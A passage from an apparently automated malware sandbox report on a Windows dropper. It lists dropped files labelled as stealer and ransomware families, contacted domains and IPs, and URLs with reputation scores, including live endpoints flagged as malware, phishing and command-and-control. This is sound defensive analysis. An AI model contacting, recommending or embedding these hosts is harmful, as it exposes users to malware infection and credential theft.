                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\libstdc++-6.dll47%ReversingLabsWin32.Trojan.Redlinestealer
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\libwinpthread-1.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe68%ReversingLabsWin32.Trojan.ArkeiStealer
                  C:\Users\user\AppData\Local\Temp\r6f7sE.I74%ReversingLabsWin32.Trojan.BunituCrypt
                  C:\Users\user\AppData\Local\Temp\setup_installer.exe68%ReversingLabsWin32.Ransomware.StopCrypt
                  C:\Users\user\AppData\Roaming\bgjifes88%ReversingLabsWin32.Ransomware.StopCrypt
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  gmpeople.com12%VirustotalBrowse
                  cdn.discordapp.com1%VirustotalBrowse
                  ip-api.com0%VirustotalBrowse
                  iplogger.org0%VirustotalBrowse
                  wfsdragon.ru9%VirustotalBrowse
                  pastebin.com0%VirustotalBrowse
                  hsiens.xyz11%VirustotalBrowse
                  t.gogamec.com14%VirustotalBrowse
                  topniemannpickshop.cc13%VirustotalBrowse
                  buy-fantasy-football.com.sg10%VirustotalBrowse
                  all-mobile-pa1ments.com.mx11%VirustotalBrowse
                  niemannbest.me11%VirustotalBrowse
                  ggg-cl.biz9%VirustotalBrowse
                  SourceDetectionScannerLabelLink
                  https://aka.ms/odirmr0%URL Reputationsafe
                  https://aka.ms/odirmr0%URL Reputationsafe
                  http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%URL Reputationsafe
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
                  https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
                  https://simpleflying.com/how-do-you-become-an-air-traffic-controller/0%URL Reputationsafe
                  https://g.live.com/odclientsettings/Prod.C:0%URL Reputationsafe
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b60%URL Reputationsafe
                  https://wns.windows.com/L0%URL Reputationsafe
                  https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested0%URL Reputationsafe
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2004/08/addressing0%URL Reputationsafe
                  http://tempuri.org/IContract/ExtensionProcessesResponseH90%Avira URL Cloudsafe
                  https://www.rd.com/list/polite-habits-campers-dislike/0%URL Reputationsafe
                  https://outlook.com_0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns0%URL Reputationsafe
                  http://tempuri.org/IContract/CheckConnectResponse0%Avira URL Cloudsafe
                  https://gcc.gnu.org/bugs/):0%Avira URL Cloudsafe
                  http://tempuri.org/IContract/ExtensionLanguagesResponseH90%Avira URL Cloudsafe
                  http://ocsp.sectigo.com00%URL Reputationsafe
                  http://lecanardstsornin.com/upload/100%Avira URL Cloudmalware
                  http://tempuri.org/IContract/ExtensionProcessesResponse0%Avira URL Cloudsafe
                  http://tempuri.org/IContract/ExtensionSteamFilesResponse0%Avira URL Cloudsafe
                  https://gcc.gnu.org/bugs/):0%VirustotalBrowse
                  https://t.gogamec.com/os100%Avira URL Cloudphishing
                  https://all-mobile-pa1ments.com.mx/0%Avira URL Cloudsafe
                  http://tempuri.org/IContract/CheckConnectResponse1%VirustotalBrowse
                  https://t.gogamec.com/ps100%Avira URL Cloudmalware
                  http://45.9.20.13/partner/loot.php?pub=mixone750%Avira URL Cloudsafe
                  https://all-mobile-pa1ments.com.mx/11%VirustotalBrowse
                  http://tempuri.org/IContract/ExtensionOpenVPNResponse0%Avira URL Cloudsafe
                  http://tempuri.org/IContract/ExtensionProcessesResponse1%VirustotalBrowse
                  http://lecanardstsornin.com/upload/12%VirustotalBrowse
                  http://tempuri.org/0%Avira URL Cloudsafe
                  http://wfsdragon.ru/api/setStats.php100%Avira URL Cloudphishing
                  http://tempuri.org/IContract/ExtensionHardwaresLR0%Avira URL Cloudsafe
                  https://cdn.discorP0%Avira URL Cloudsafe
                  http://tempuri.org/1%VirustotalBrowse
                  http://45.9.20.13/partner/loot.php?pub=mixone80%Avira URL Cloudsafe
                  http://tempuri.org/IContract/ExtensionOpenVPNResponse1%VirustotalBrowse
                  http://tempuri.org/IContract/ExtensionSteamFilesResponse1%VirustotalBrowse
                  http://tempuri.org/IContract/ExtensionInstalledBrowsers0%Avira URL Cloudsafe
                  https://t.gogame.v0%Avira URL Cloudsafe
                  http://tempuri.org/IContract/ExtensionNordVPNResponseH90%Avira URL Cloudsafe
                  http://wfsdragon.ru/api/setStats.php11%VirustotalBrowse
                  https://curl.se/0%Avira URL Cloudsafe
                  http://tempuri.org/IContract/ExtensionBrowsers0%Avira URL Cloudsafe
                  http://wfsdragon.ru/0%Avira URL Cloudsafe
                  http://45.9.20.13/partner/loot.php?pub=mixone86%VirustotalBrowse
                  http://tempuri.org/IContract/ExtensionSteamFiles0%Avira URL Cloudsafe
                  http://tempuri.org/IContract/ExtensionHardwaresLR1%VirustotalBrowse
                  http://45.9.20.13/partner/loot.php?pub=mixone?0%Avira URL Cloudsafe
                  http://camasirx.com/upload/100%Avira URL Cloudphishing
                  https://t.gogamec.com:443/2302/sqlite.date.dat100%Avira URL Cloudmalware
                  http://wfsdragon.ru/9%VirustotalBrowse
                  https://curl.se/0%VirustotalBrowse
                  http://tempuri.org/IContract/ExtensionDiscordLR0%Avira URL Cloudsafe
                  https://iplogger.org/1a3jd70%Avira URL Cloudsafe
                  http://tempuri.org/IContract/ExtensionBrowsers1%VirustotalBrowse
                  http://tempuri.org/IContract/ExtensionColdWalletsLR0%Avira URL Cloudsafe
                  https://niemannbest.me/?username=p11_2100%Avira URL Cloudmalware
                  http://tempuri.org/IContract/ExtensionDiscordLR1%VirustotalBrowse
                  https://topniemannpickshop.cc0%Avira URL Cloudsafe
                  http://tempuri.org/IContract/ExtensionColdWalletsLR1%VirustotalBrowse
                  https://niemannbest.me/?username=p11_1100%Avira URL Cloudmalware
                  https://topniemannpickshop.cc14%VirustotalBrowse
                  http://tempuri.org/IContract/InitDisplay0%Avira URL Cloudsafe
                  http://tempuri.org/IContract/ExtensionSteamFiles1%VirustotalBrowse
                  http://tempuri.org/IContract/ConfirmResponse0%Avira URL Cloudsafe
                  http://camasirx.com/upload/13%VirustotalBrowse
                  http://tempuri.org/IContract/ExtensionInstalledBrowsers1%VirustotalBrowse
                  https://t.gogamec.com:443/2302/sqlite.dat02/sqlite.dat100%Avira URL Cloudphishing
                  https://niemannbest.me/?username=p11_114%VirustotalBrowse
                  https://niemannbest.me/?username=p11_212%VirustotalBrowse
                  http://tempuri.org/IContract/InitResponse0%Avira URL Cloudsafe
                  http://tempuri.org/IContract/InitDisplay1%VirustotalBrowse
                  http://hsiens.xyz/addInstallImpression.php?key=125478824515ADNxu2ccbwe&ip=&oid=139100%Avira URL Cloudphishing
                  https://iplogger.org/1a3jd74%VirustotalBrowse
                  http://tempuri.org/IContract/ExtensionNordVPN0%Avira URL Cloudsafe
                  http://tempuri.org/IContract/EnvironmentSettingsLR0%Avira URL Cloudsafe
                  https://niemannbest.me100%Avira URL Cloudmalware
                  https://t.gogamec.com//y100%Avira URL Cloudmalware
                  http://tempuri.org/IContract/ConfirmResponse1%VirustotalBrowse
                  http://tempuri.org/IContract/InitResponse1%VirustotalBrowse
                  https://niemannbest.me/?username=p11_7100%Avira URL Cloudmalware
                  http://tempuri.org/IContract/ExtensionScannedFiles0%Avira URL Cloudsafe
                  https://t.gogamec.com/2302/sqlit.~100%Avira URL Cloudmalware
                  http://tempuri.org/IContract/ExtensionNordVPN1%VirustotalBrowse
                  http://staticimg.youtuuee.com/bz0%Avira URL Cloudsafe
                  https://niemannbest.me/?username=p11_4100%Avira URL Cloudmalware
                  http://hsiens.xyz/addInstallImpression.php?key=125478824515ADNxu2ccbwe&ip=&oid=13914%VirustotalBrowse
                  https://niemannbest.me/?username=p11_3100%Avira URL Cloudmalware
                  https://niemannbest.me/?username=p11_6100%Avira URL Cloudmalware
                  http://tempuri.org/IContract/SetEnvironmentResponse0%Avira URL Cloudsafe
                  https://niemannbest.me/?username=p11_5100%Avira URL Cloudmalware
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  gmpeople.com
                  188.40.141.211
                  truetrueunknown
                  cdn.discordapp.com
                  162.159.130.233
                  truefalseunknown
                  ip-api.com
                  208.95.112.1
                  truefalseunknown
                  iplogger.org
                  172.67.132.113
                  truefalseunknown
                  wfsdragon.ru
                  172.67.133.215
                  truefalseunknown
                  pastebin.com
                  172.67.19.24
                  truetrueunknown
                  niemannbest.me
                  unknown
                  unknowntrueunknown
                  all-mobile-pa1ments.com.mx
                  unknown
                  unknowntrueunknown
                  t.gogamec.com
                  unknown
                  unknowntrueunknown
                  ggg-cl.biz
                  unknown
                  unknowntrueunknown
                  buy-fantasy-football.com.sg
                  unknown
                  unknowntrueunknown
                  hsiens.xyz
                  unknown
                  unknowntrueunknown
                  topniemannpickshop.cc
                  unknown
                  unknowntrueunknown
                  NameMaliciousAntivirus DetectionReputation
                  http://lecanardstsornin.com/upload/true
                  • 12%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  unknown
                  http://camasirx.com/upload/true
                  • 13%, Virustotal, Browse
                  • Avira URL Cloud: phishing
                  unknown
                  https://iplogger.org/1a3jd7false
                  • 4%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://aka.ms/odirmrexplorer.exe, 0000002F.00000002.4164547878.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.1884635558.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  https://gcc.gnu.org/bugs/):setup_install.exe.1.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://tempuri.org/IContract/ExtensionProcessesResponseH9Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005960000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.000000000590E000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.00000000059B0000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://tempuri.org/IContract/CheckConnectResponseMon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0Mon17eac6d534bfd22c7.exe, 0000000E.00000002.1820493066.0000000003E41000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://tempuri.org/IContract/ExtensionLanguagesResponseH9Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005960000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.000000000590E000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.00000000059B0000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://tempuri.org/IContract/ExtensionProcessesResponseMon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://tempuri.org/IContract/ExtensionSteamFilesResponseMon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4175875048.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.1908199562.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://t.gogamec.com/osMon17742f90b916675f2.exe, 00000012.00000003.1859456387.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.1820315915.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.1831342016.0000000000A43000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  unknown
                  https://all-mobile-pa1ments.com.mx/Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.00000000024E4000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 11%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://t.gogamec.com/psMon17742f90b916675f2.exe, 00000012.00000002.4154013550.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.1831342016.0000000000A43000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  http://45.9.20.13/partner/loot.php?pub=mixone75Mon1785436ae78.exe, 0000001A.00000002.4154497418.0000000001AA3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://tempuri.org/IContract/ExtensionOpenVPNResponseMon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://tempuri.org/Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002761000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://wfsdragon.ru/api/setStats.phpMon17b5f403be4d8d6b.exe, 00000017.00000002.2185781811.0000000003267000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 11%, Virustotal, Browse
                  • Avira URL Cloud: phishing
                  unknown
                  https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://tempuri.org/IContract/ExtensionHardwaresLRMon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F5E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000072C1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A9F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://cdn.discorPMon178817e243.exe, 00000016.00000002.4158008324.00000000033F2000.00000004.00000800.00020000.00000000.sdmp, Mon178817e243.exe, 00000016.00000002.4158008324.00000000033F6000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://45.9.20.13/partner/loot.php?pub=mixone8Mon1785436ae78.exe, 0000001A.00000002.4154497418.0000000001AA3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 6%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://tempuri.org/IContract/ExtensionInstalledBrowsersMon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006F4F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, 